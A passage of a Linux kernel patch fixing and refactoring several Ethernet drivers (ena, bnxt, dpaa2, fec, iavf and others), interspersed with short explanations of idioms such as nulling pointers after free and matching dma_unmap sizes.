+ static void ena_increase_stat(u64 *statp, u64 cnt,
+@@ -457,23 +459,22 @@ static void ena_init_all_xdp_queues(struct ena_adapter *adapter)
+ 
+ static int ena_setup_and_create_all_xdp_queues(struct ena_adapter *adapter)
+ {
++	u32 xdp_first_ring = adapter->xdp_first_ring;
++	u32 xdp_num_queues = adapter->xdp_num_queues;
+ 	int rc = 0;
+ 
+-	rc = ena_setup_tx_resources_in_range(adapter, adapter->xdp_first_ring,
+-					     adapter->xdp_num_queues);
++	rc = ena_setup_tx_resources_in_range(adapter, xdp_first_ring, xdp_num_queues);
+ 	if (rc)
+ 		goto setup_err;
+ 
+-	rc = ena_create_io_tx_queues_in_range(adapter,
+-					      adapter->xdp_first_ring,
+-					      adapter->xdp_num_queues);
++	rc = ena_create_io_tx_queues_in_range(adapter, xdp_first_ring, xdp_num_queues);
+ 	if (rc)
+ 		goto create_err;
+ 
+ 	return 0;
+ 
+ create_err:
+-	ena_free_all_io_tx_resources(adapter);
++	ena_free_all_io_tx_resources_in_range(adapter, xdp_first_ring, xdp_num_queues);
+ setup_err:
+ 	return rc;
+ }
+@@ -1617,20 +1618,23 @@ static void ena_set_rx_hash(struct ena_ring *rx_ring,
+ 	}
+ }
+ 
+-static int ena_xdp_handle_buff(struct ena_ring *rx_ring, struct xdp_buff *xdp)
++static int ena_xdp_handle_buff(struct ena_ring *rx_ring, struct xdp_buff *xdp, u16 num_descs)
+ {
+ 	struct ena_rx_buffer *rx_info;
+ 	int ret;
+ 
++	/* XDP multi-buffer packets not supported */
++	if (unlikely(num_descs > 1)) {
++		netdev_err_once(rx_ring->adapter->netdev,
++				"xdp: dropped unsupported multi-buffer packets\n");
++		ena_increase_stat(&rx_ring->rx_stats.xdp_drop, 1, &rx_ring->syncp);
++		return ENA_XDP_DROP;
++	}
++
+ 	rx_info = &rx_ring->rx_buffer_info[rx_ring->ena_bufs[0].req_id];
+ 	xdp_prepare_buff(xdp, page_address(rx_info->page),
+ 			 rx_info->page_offset,
+ 			 rx_ring->ena_bufs[0].len, false);
+-	/* If for some reason we received a bigger packet than
+-	 * we expect, then we simply drop it
+-	 */
+-	if (unlikely(rx_ring->ena_bufs[0].len > ENA_XDP_MAX_MTU))
+-		return ENA_XDP_DROP;
+ 
+ 	ret = ena_xdp_execute(rx_ring, xdp);
+ 
+@@ -1699,7 +1703,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 			  ena_rx_ctx.l4_proto, ena_rx_ctx.hash);
+ 
+ 		if (ena_xdp_present_ring(rx_ring))
+-			xdp_verdict = ena_xdp_handle_buff(rx_ring, &xdp);
++			xdp_verdict = ena_xdp_handle_buff(rx_ring, &xdp, ena_rx_ctx.descs);
+ 
+ 		/* allocate skb and fill it */
+ 		if (xdp_verdict == ENA_XDP_PASS)
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index b5a49166fa972..4d9d7d1edb9b3 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -938,11 +938,14 @@ void aq_ring_free(struct aq_ring_s *self)
+ 		return;
+ 
+ 	kfree(self->buff_ring);
++	self->buff_ring = NULL;
+ 
+-	if (self->dx_ring)
++	if (self->dx_ring) {
+ 		dma_free_coherent(aq_nic_get_dev(self->aq_nic),
+ 				  self->size * self->dx_size, self->dx_ring,
+ 				  self->dx_ring_pa);
++		self->dx_ring = NULL;
++	}
+ }
+ 
+ unsigned int aq_ring_fill_stats_data(struct aq_ring_s *self, u64 *data)
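
Clearing buff_ring and dx_ring after freeing them makes aq_ring_free() idempotent: a second call, for instance from an error-unwind path, sees NULL and does nothing instead of double-freeing. The idiom in isolation, with a hypothetical ring struct:

#include <linux/slab.h>

struct ring {
	void *buf;
};

/* Safe to call more than once on the same ring. */
static void ring_free(struct ring *r)
{
	kfree(r->buf);		/* kfree(NULL) is a no-op */
	r->buf = NULL;		/* so repeated calls stay harmless */
}
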
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+index 16c490692f422..4950fde82d175 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+@@ -1923,8 +1923,7 @@ u16 bnx2x_select_queue(struct net_device *dev, struct sk_buff *skb,
+ 
+ 		/* Skip VLAN tag if present */
+ 		if (ether_type == ETH_P_8021Q) {
+-			struct vlan_ethhdr *vhdr =
+-				(struct vlan_ethhdr *)skb->data;
++			struct vlan_ethhdr *vhdr = skb_vlan_eth_hdr(skb);
+ 
+ 			ether_type = ntohs(vhdr->h_vlan_encapsulated_proto);
+ 		}
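
This bnx2x hunk, like the later benet, fec, hns3 and i40e ones, swaps an open-coded cast of skb->data for the skb_vlan_eth_hdr() helper. The helper (in include/linux/if_vlan.h) amounts to a typed accessor, roughly:

/* Roughly the if_vlan.h helper these hunks switch to: a typed view of
 * the frame start, replacing repeated open-coded casts.
 */
static inline struct vlan_ethhdr *skb_vlan_eth_hdr(const struct sk_buff *skb)
{
	return (struct vlan_ethhdr *)skb->data;
}
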
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index e81cb825dff4c..623cdeb29ed90 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -1796,6 +1796,21 @@ static void bnxt_deliver_skb(struct bnxt *bp, struct bnxt_napi *bnapi,
+ 	napi_gro_receive(&bnapi->napi, skb);
+ }
+ 
++static bool bnxt_rx_ts_valid(struct bnxt *bp, u32 flags,
++			     struct rx_cmp_ext *rxcmp1, u32 *cmpl_ts)
++{
++	u32 ts = le32_to_cpu(rxcmp1->rx_cmp_timestamp);
++
++	if (BNXT_PTP_RX_TS_VALID(flags))
++		goto ts_valid;
++	if (!bp->ptp_all_rx_tstamp || !ts || !BNXT_ALL_RX_TS_VALID(flags))
++		return false;
++
++ts_valid:
++	*cmpl_ts = ts;
++	return true;
++}
++
+ /* returns the following:
+  * 1       - 1 packet successfully received
+  * 0       - successful TPA_START, packet not completed yet
+@@ -1821,6 +1836,7 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 	struct sk_buff *skb;
+ 	struct xdp_buff xdp;
+ 	u32 flags, misc;
++	u32 cmpl_ts;
+ 	void *data;
+ 	int rc = 0;
+ 
+@@ -2043,10 +2059,8 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 		}
+ 	}
+ 
+-	if (unlikely((flags & RX_CMP_FLAGS_ITYPES_MASK) ==
+-		     RX_CMP_FLAGS_ITYPE_PTP_W_TS) || bp->ptp_all_rx_tstamp) {
++	if (bnxt_rx_ts_valid(bp, flags, rxcmp1, &cmpl_ts)) {
+ 		if (bp->flags & BNXT_FLAG_CHIP_P5) {
+-			u32 cmpl_ts = le32_to_cpu(rxcmp1->rx_cmp_timestamp);
+ 			u64 ns, ts;
+ 
+ 			if (!bnxt_get_rx_ts_p5(bp, &ts, cmpl_ts)) {
+@@ -10708,8 +10722,10 @@ static void __bnxt_close_nic(struct bnxt *bp, bool irq_re_init,
+ 	bnxt_free_skbs(bp);
+ 
+ 	/* Save ring stats before shutdown */
+-	if (bp->bnapi && irq_re_init)
++	if (bp->bnapi && irq_re_init) {
+ 		bnxt_get_ring_stats(bp, &bp->net_stats_prev);
++		bnxt_get_ring_err_stats(bp, &bp->ring_err_stats_prev);
++	}
+ 	if (irq_re_init) {
+ 		bnxt_free_irq(bp);
+ 		bnxt_del_napi(bp);
+@@ -10717,10 +10733,8 @@ static void __bnxt_close_nic(struct bnxt *bp, bool irq_re_init,
+ 	bnxt_free_mem(bp, irq_re_init);
+ }
+ 
+-int bnxt_close_nic(struct bnxt *bp, bool irq_re_init, bool link_re_init)
++void bnxt_close_nic(struct bnxt *bp, bool irq_re_init, bool link_re_init)
+ {
+-	int rc = 0;
+-
+ 	if (test_bit(BNXT_STATE_IN_FW_RESET, &bp->state)) {
+ 		/* If we get here, it means firmware reset is in progress
+ 		 * while we are trying to close.  We can safely proceed with
+@@ -10735,15 +10749,18 @@ int bnxt_close_nic(struct bnxt *bp, bool irq_re_init, bool link_re_init)
+ 
+ #ifdef CONFIG_BNXT_SRIOV
+ 	if (bp->sriov_cfg) {
++		int rc;
++
+ 		rc = wait_event_interruptible_timeout(bp->sriov_cfg_wait,
+ 						      !bp->sriov_cfg,
+ 						      BNXT_SRIOV_CFG_WAIT_TMO);
+-		if (rc)
+-			netdev_warn(bp->dev, "timeout waiting for SRIOV config operation to complete!\n");
++		if (!rc)
++			netdev_warn(bp->dev, "timeout waiting for SRIOV config operation to complete, proceeding to close!\n");
++		else if (rc < 0)
++			netdev_warn(bp->dev, "SRIOV config operation interrupted, proceeding to close!\n");
+ 	}
+ #endif
+ 	__bnxt_close_nic(bp, irq_re_init, link_re_init);
+-	return rc;
+ }
+ 
+ static int bnxt_close(struct net_device *dev)
+@@ -10958,6 +10975,34 @@ bnxt_get_stats64(struct net_device *dev, struct rtnl_link_stats64 *stats)
+ 	clear_bit(BNXT_STATE_READ_STATS, &bp->state);
+ }
+ 
++static void bnxt_get_one_ring_err_stats(struct bnxt *bp,
++					struct bnxt_total_ring_err_stats *stats,
++					struct bnxt_cp_ring_info *cpr)
++{
++	struct bnxt_sw_stats *sw_stats = &cpr->sw_stats;
++	u64 *hw_stats = cpr->stats.sw_stats;
++
++	stats->rx_total_l4_csum_errors += sw_stats->rx.rx_l4_csum_errors;
++	stats->rx_total_resets += sw_stats->rx.rx_resets;
++	stats->rx_total_buf_errors += sw_stats->rx.rx_buf_errors;
++	stats->rx_total_oom_discards += sw_stats->rx.rx_oom_discards;
++	stats->rx_total_netpoll_discards += sw_stats->rx.rx_netpoll_discards;
++	stats->rx_total_ring_discards +=
++		BNXT_GET_RING_STATS64(hw_stats, rx_discard_pkts);
++	stats->tx_total_ring_discards +=
++		BNXT_GET_RING_STATS64(hw_stats, tx_discard_pkts);
++	stats->total_missed_irqs += sw_stats->cmn.missed_irqs;
++}
++
++void bnxt_get_ring_err_stats(struct bnxt *bp,
++			     struct bnxt_total_ring_err_stats *stats)
++{
++	int i;
++
++	for (i = 0; i < bp->cp_nr_rings; i++)
++		bnxt_get_one_ring_err_stats(bp, stats, &bp->bnapi[i]->cp_ring);
++}
++
+ static bool bnxt_mc_list_updated(struct bnxt *bp, u32 *rx_mask)
+ {
+ 	struct net_device *dev = bp->dev;
+@@ -13882,6 +13927,8 @@ static int bnxt_resume(struct device *device)
+ 	if (rc)
+ 		goto resume_exit;
+ 
++	bnxt_clear_reservations(bp, true);
++
+ 	if (bnxt_hwrm_func_drv_rgtr(bp, NULL, 0, false)) {
+ 		rc = -ENODEV;
+ 		goto resume_exit;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index 1d2588c92977e..111098b4b6062 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -160,7 +160,7 @@ struct rx_cmp {
+ 	#define RX_CMP_FLAGS_ERROR				(1 << 6)
+ 	#define RX_CMP_FLAGS_PLACEMENT				(7 << 7)
+ 	#define RX_CMP_FLAGS_RSS_VALID				(1 << 10)
+-	#define RX_CMP_FLAGS_UNUSED				(1 << 11)
++	#define RX_CMP_FLAGS_PKT_METADATA_PRESENT		(1 << 11)
+ 	 #define RX_CMP_FLAGS_ITYPES_SHIFT			 12
+ 	 #define RX_CMP_FLAGS_ITYPES_MASK			 0xf000
+ 	 #define RX_CMP_FLAGS_ITYPE_UNKNOWN			 (0 << 12)
+@@ -187,6 +187,12 @@ struct rx_cmp {
+ 	__le32 rx_cmp_rss_hash;
+ };
+ 
++#define BNXT_PTP_RX_TS_VALID(flags)				\
++	(((flags) & RX_CMP_FLAGS_ITYPES_MASK) == RX_CMP_FLAGS_ITYPE_PTP_W_TS)
++
++#define BNXT_ALL_RX_TS_VALID(flags)				\
++	!((flags) & RX_CMP_FLAGS_PKT_METADATA_PRESENT)
++
+ #define RX_CMP_HASH_VALID(rxcmp)				\
+ 	((rxcmp)->rx_cmp_len_flags_type & cpu_to_le32(RX_CMP_FLAGS_RSS_VALID))
+ 
+@@ -950,6 +956,17 @@ struct bnxt_sw_stats {
+ 	struct bnxt_cmn_sw_stats cmn;
+ };
+ 
++struct bnxt_total_ring_err_stats {
++	u64			rx_total_l4_csum_errors;
++	u64			rx_total_resets;
++	u64			rx_total_buf_errors;
++	u64			rx_total_oom_discards;
++	u64			rx_total_netpoll_discards;
++	u64			rx_total_ring_discards;
++	u64			tx_total_ring_discards;
++	u64			total_missed_irqs;
++};
++
+ struct bnxt_stats_mem {
+ 	u64		*sw_stats;
+ 	u64		*hw_masks;
+@@ -2007,6 +2024,8 @@ struct bnxt {
+ 	u8			pri2cos_idx[8];
+ 	u8			pri2cos_valid;
+ 
++	struct bnxt_total_ring_err_stats ring_err_stats_prev;
++
+ 	u16			hwrm_max_req_len;
+ 	u16			hwrm_max_ext_req_len;
+ 	unsigned int		hwrm_cmd_timeout;
+@@ -2330,7 +2349,9 @@ int bnxt_open_nic(struct bnxt *, bool, bool);
+ int bnxt_half_open_nic(struct bnxt *bp);
+ void bnxt_half_close_nic(struct bnxt *bp);
+ void bnxt_reenable_sriov(struct bnxt *bp);
+-int bnxt_close_nic(struct bnxt *, bool, bool);
++void bnxt_close_nic(struct bnxt *, bool, bool);
++void bnxt_get_ring_err_stats(struct bnxt *bp,
++			     struct bnxt_total_ring_err_stats *stats);
+ int bnxt_dbg_hwrm_rd_reg(struct bnxt *bp, u32 reg_off, u16 num_words,
+ 			 u32 *reg_buf);
+ void bnxt_fw_exception(struct bnxt *bp);
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_devlink.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_devlink.c
+index 8a6f788f62944..2bdebd9c069d8 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_devlink.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_devlink.c
+@@ -478,15 +478,8 @@ static int bnxt_dl_reload_down(struct devlink *dl, bool netns_change,
+ 			return -ENODEV;
+ 		}
+ 		bnxt_ulp_stop(bp);
+-		if (netif_running(bp->dev)) {
+-			rc = bnxt_close_nic(bp, true, true);
+-			if (rc) {
+-				NL_SET_ERR_MSG_MOD(extack, "Failed to close");
+-				dev_close(bp->dev);
+-				rtnl_unlock();
+-				break;
+-			}
+-		}
++		if (netif_running(bp->dev))
++			bnxt_close_nic(bp, true, true);
+ 		bnxt_vf_reps_free(bp);
+ 		rc = bnxt_hwrm_func_drv_unrgtr(bp);
+ 		if (rc) {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index 89f046ce1373c..7260b4671ecca 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -164,9 +164,8 @@ static int bnxt_set_coalesce(struct net_device *dev,
+ reset_coalesce:
+ 	if (test_bit(BNXT_STATE_OPEN, &bp->state)) {
+ 		if (update_stats) {
+-			rc = bnxt_close_nic(bp, true, false);
+-			if (!rc)
+-				rc = bnxt_open_nic(bp, true, false);
++			bnxt_close_nic(bp, true, false);
++			rc = bnxt_open_nic(bp, true, false);
+ 		} else {
+ 			rc = bnxt_hwrm_set_coal(bp);
+ 		}
+@@ -956,12 +955,7 @@ static int bnxt_set_channels(struct net_device *dev,
+ 			 * before PF unload
+ 			 */
+ 		}
+-		rc = bnxt_close_nic(bp, true, false);
+-		if (rc) {
+-			netdev_err(bp->dev, "Set channel failure rc :%x\n",
+-				   rc);
+-			return rc;
+-		}
++		bnxt_close_nic(bp, true, false);
+ 	}
+ 
+ 	if (sh) {
+@@ -3634,12 +3628,7 @@ static void bnxt_self_test(struct net_device *dev, struct ethtool_test *etest,
+ 		bnxt_run_fw_tests(bp, test_mask, &test_results);
+ 	} else {
+ 		bnxt_ulp_stop(bp);
+-		rc = bnxt_close_nic(bp, true, false);
+-		if (rc) {
+-			etest->flags |= ETH_TEST_FL_FAILED;
+-			bnxt_ulp_start(bp, rc);
+-			return;
+-		}
++		bnxt_close_nic(bp, true, false);
+ 		bnxt_run_fw_tests(bp, test_mask, &test_results);
+ 
+ 		buf[BNXT_MACLPBK_TEST_IDX] = 1;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+index 4faaa9a50f4bc..ae734314f8de5 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+@@ -506,9 +506,8 @@ static int bnxt_hwrm_ptp_cfg(struct bnxt *bp)
+ 
+ 	if (netif_running(bp->dev)) {
+ 		if (ptp->rx_filter == HWTSTAMP_FILTER_ALL) {
+-			rc = bnxt_close_nic(bp, false, false);
+-			if (!rc)
+-				rc = bnxt_open_nic(bp, false, false);
++			bnxt_close_nic(bp, false, false);
++			rc = bnxt_open_nic(bp, false, false);
+ 		} else {
+ 			bnxt_ptp_cfg_tstamp_filters(bp);
+ 		}
+diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c
+index b12152e2fca0a..a9e4e6464a04c 100644
+--- a/drivers/net/ethernet/emulex/benet/be_main.c
++++ b/drivers/net/ethernet/emulex/benet/be_main.c
+@@ -1125,7 +1125,7 @@ static struct sk_buff *be_lancer_xmit_workarounds(struct be_adapter *adapter,
+ 						  struct be_wrb_params
+ 						  *wrb_params)
+ {
+-	struct vlan_ethhdr *veh = (struct vlan_ethhdr *)skb->data;
++	struct vlan_ethhdr *veh = skb_vlan_eth_hdr(skb);
+ 	unsigned int eth_hdr_len;
+ 	struct iphdr *ip;
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch-flower.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch-flower.c
+index c39b866e2582d..16d3c3610720b 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch-flower.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch-flower.c
+@@ -139,7 +139,8 @@ int dpaa2_switch_acl_entry_add(struct dpaa2_switch_filter_block *filter_block,
+ 	err = dpsw_acl_add_entry(ethsw->mc_io, 0, ethsw->dpsw_handle,
+ 				 filter_block->acl_id, acl_entry_cfg);
+ 
+-	dma_unmap_single(dev, acl_entry_cfg->key_iova, sizeof(cmd_buff),
++	dma_unmap_single(dev, acl_entry_cfg->key_iova,
++			 DPAA2_ETHSW_PORT_ACL_CMD_BUF_SIZE,
+ 			 DMA_TO_DEVICE);
+ 	if (err) {
+ 		dev_err(dev, "dpsw_acl_add_entry() failed %d\n", err);
+@@ -181,8 +182,8 @@ dpaa2_switch_acl_entry_remove(struct dpaa2_switch_filter_block *block,
+ 	err = dpsw_acl_remove_entry(ethsw->mc_io, 0, ethsw->dpsw_handle,
+ 				    block->acl_id, acl_entry_cfg);
+ 
+-	dma_unmap_single(dev, acl_entry_cfg->key_iova, sizeof(cmd_buff),
+-			 DMA_TO_DEVICE);
++	dma_unmap_single(dev, acl_entry_cfg->key_iova,
++			 DPAA2_ETHSW_PORT_ACL_CMD_BUF_SIZE, DMA_TO_DEVICE);
+ 	if (err) {
+ 		dev_err(dev, "dpsw_acl_remove_entry() failed %d\n", err);
+ 		kfree(cmd_buff);
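
The dpaa2 fix above is the classic sizeof-on-a-pointer bug: cmd_buff is a pointer, so sizeof(cmd_buff) is 8 on 64-bit rather than the mapped length, and dma_unmap_single() must be passed exactly the size that was mapped. A sketch of the symmetric map/unmap rule (hypothetical buffer-length macro):

#include <linux/dma-mapping.h>
#include <linux/slab.h>

#define CMD_BUF_SIZE 256	/* hypothetical: the length actually mapped */

static int send_cmd(struct device *dev)
{
	u8 *cmd_buff = kzalloc(CMD_BUF_SIZE, GFP_KERNEL);
	dma_addr_t iova;

	if (!cmd_buff)
		return -ENOMEM;

	iova = dma_map_single(dev, cmd_buff, CMD_BUF_SIZE, DMA_TO_DEVICE);
	if (dma_mapping_error(dev, iova)) {
		kfree(cmd_buff);
		return -ENOMEM;
	}

	/* ... hand iova to the hardware ... */

	/* unmap with the same length: sizeof(cmd_buff) would be 8 here */
	dma_unmap_single(dev, iova, CMD_BUF_SIZE, DMA_TO_DEVICE);
	kfree(cmd_buff);
	return 0;
}
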
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
+index 2b5909fa93cfa..b98ef4ba172f6 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
+@@ -1978,9 +1978,6 @@ static int dpaa2_switch_port_attr_set_event(struct net_device *netdev,
+ 	return notifier_from_errno(err);
+ }
+ 
+-static struct notifier_block dpaa2_switch_port_switchdev_nb;
+-static struct notifier_block dpaa2_switch_port_switchdev_blocking_nb;
+-
+ static int dpaa2_switch_port_bridge_join(struct net_device *netdev,
+ 					 struct net_device *upper_dev,
+ 					 struct netlink_ext_ack *extack)
+@@ -2023,9 +2020,7 @@ static int dpaa2_switch_port_bridge_join(struct net_device *netdev,
+ 		goto err_egress_flood;
+ 
+ 	err = switchdev_bridge_port_offload(netdev, netdev, NULL,
+-					    &dpaa2_switch_port_switchdev_nb,
+-					    &dpaa2_switch_port_switchdev_blocking_nb,
+-					    false, extack);
++					    NULL, NULL, false, extack);
+ 	if (err)
+ 		goto err_switchdev_offload;
+ 
+@@ -2059,9 +2054,7 @@ static int dpaa2_switch_port_restore_rxvlan(struct net_device *vdev, int vid, vo
+ 
+ static void dpaa2_switch_port_pre_bridge_leave(struct net_device *netdev)
+ {
+-	switchdev_bridge_port_unoffload(netdev, NULL,
+-					&dpaa2_switch_port_switchdev_nb,
+-					&dpaa2_switch_port_switchdev_blocking_nb);
++	switchdev_bridge_port_unoffload(netdev, NULL, NULL, NULL);
+ }
+ 
+ static int dpaa2_switch_port_bridge_leave(struct net_device *netdev)
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 33226a22d8a4a..6d1b760022821 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -3541,31 +3541,26 @@ static int fec_set_features(struct net_device *netdev,
+ 	return 0;
+ }
+ 
+-static u16 fec_enet_get_raw_vlan_tci(struct sk_buff *skb)
+-{
+-	struct vlan_ethhdr *vhdr;
+-	unsigned short vlan_TCI = 0;
+-
+-	if (skb->protocol == htons(ETH_P_ALL)) {
+-		vhdr = (struct vlan_ethhdr *)(skb->data);
+-		vlan_TCI = ntohs(vhdr->h_vlan_TCI);
+-	}
+-
+-	return vlan_TCI;
+-}
+-
+ static u16 fec_enet_select_queue(struct net_device *ndev, struct sk_buff *skb,
+ 				 struct net_device *sb_dev)
+ {
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+-	u16 vlan_tag;
++	u16 vlan_tag = 0;
+ 
+ 	if (!(fep->quirks & FEC_QUIRK_HAS_AVB))
+ 		return netdev_pick_tx(ndev, skb, NULL);
+ 
+-	vlan_tag = fec_enet_get_raw_vlan_tci(skb);
+-	if (!vlan_tag)
++	/* VLAN is present in the payload. */
++	if (eth_type_vlan(skb->protocol)) {
++		struct vlan_ethhdr *vhdr = skb_vlan_eth_hdr(skb);
++
++		vlan_tag = ntohs(vhdr->h_vlan_TCI);
++	/* VLAN is present in the skb but not yet pushed into the payload. */
++	} else if (skb_vlan_tag_present(skb)) {
++		vlan_tag = skb->vlan_tci;
++	} else {
+ 		return vlan_tag;
++	}
+ 
+ 	return fec_enet_vlan_pri_to_queue[vlan_tag >> 13];
+ }
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 5ad22b815b2f0..78d6752fe0519 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -1532,7 +1532,7 @@ static int hns3_handle_vtags(struct hns3_enet_ring *tx_ring,
+ 	if (unlikely(rc < 0))
+ 		return rc;
+ 
+-	vhdr = (struct vlan_ethhdr *)skb->data;
++	vhdr = skb_vlan_eth_hdr(skb);
+ 	vhdr->h_vlan_TCI |= cpu_to_be16((skb->priority << VLAN_PRIO_SHIFT)
+ 					 & VLAN_PRIO_MASK);
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index 6d26ee8eefae9..94cf82668efaa 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -2986,7 +2986,7 @@ static inline int i40e_tx_prepare_vlan_flags(struct sk_buff *skb,
+ 			rc = skb_cow_head(skb, 0);
+ 			if (rc < 0)
+ 				return rc;
+-			vhdr = (struct vlan_ethhdr *)skb->data;
++			vhdr = skb_vlan_eth_hdr(skb);
+ 			vhdr->h_vlan_TCI = htons(tx_flags >>
+ 						 I40E_TX_FLAGS_VLAN_SHIFT);
+ 		} else {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 7389855fa307a..ee0871d929302 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -303,6 +303,7 @@ struct iavf_adapter {
+ #define IAVF_FLAG_QUEUES_DISABLED		BIT(17)
+ #define IAVF_FLAG_SETUP_NETDEV_FEATURES		BIT(18)
+ #define IAVF_FLAG_REINIT_MSIX_NEEDED		BIT(20)
++#define IAVF_FLAG_FDIR_ENABLED			BIT(21)
+ /* duplicates for common code */
+ #define IAVF_FLAG_DCB_ENABLED			0
+ 	/* flags for admin queue service task */
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index 31e02624aca48..f4ac2b164b3e9 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -1063,7 +1063,7 @@ iavf_get_ethtool_fdir_entry(struct iavf_adapter *adapter,
+ 	struct iavf_fdir_fltr *rule = NULL;
+ 	int ret = 0;
+ 
+-	if (!FDIR_FLTR_SUPPORT(adapter))
++	if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 		return -EOPNOTSUPP;
+ 
+ 	spin_lock_bh(&adapter->fdir_fltr_lock);
+@@ -1205,7 +1205,7 @@ iavf_get_fdir_fltr_ids(struct iavf_adapter *adapter, struct ethtool_rxnfc *cmd,
+ 	unsigned int cnt = 0;
+ 	int val = 0;
+ 
+-	if (!FDIR_FLTR_SUPPORT(adapter))
++	if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 		return -EOPNOTSUPP;
+ 
+ 	cmd->data = IAVF_MAX_FDIR_FILTERS;
+@@ -1397,7 +1397,7 @@ static int iavf_add_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	int count = 50;
+ 	int err;
+ 
+-	if (!FDIR_FLTR_SUPPORT(adapter))
++	if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 		return -EOPNOTSUPP;
+ 
+ 	if (fsp->flow_type & FLOW_MAC_EXT)
+@@ -1438,12 +1438,16 @@ static int iavf_add_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	spin_lock_bh(&adapter->fdir_fltr_lock);
+ 	iavf_fdir_list_add_fltr(adapter, fltr);
+ 	adapter->fdir_active_fltr++;
+-	fltr->state = IAVF_FDIR_FLTR_ADD_REQUEST;
+-	adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
++	if (adapter->link_up) {
++		fltr->state = IAVF_FDIR_FLTR_ADD_REQUEST;
++		adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
++	} else {
++		fltr->state = IAVF_FDIR_FLTR_INACTIVE;
++	}
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 
+-	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+-
++	if (adapter->link_up)
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ ret:
+ 	if (err && fltr)
+ 		kfree(fltr);
+@@ -1465,7 +1469,7 @@ static int iavf_del_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	struct iavf_fdir_fltr *fltr = NULL;
+ 	int err = 0;
+ 
+-	if (!FDIR_FLTR_SUPPORT(adapter))
++	if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 		return -EOPNOTSUPP;
+ 
+ 	spin_lock_bh(&adapter->fdir_fltr_lock);
+@@ -1474,6 +1478,11 @@ static int iavf_del_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
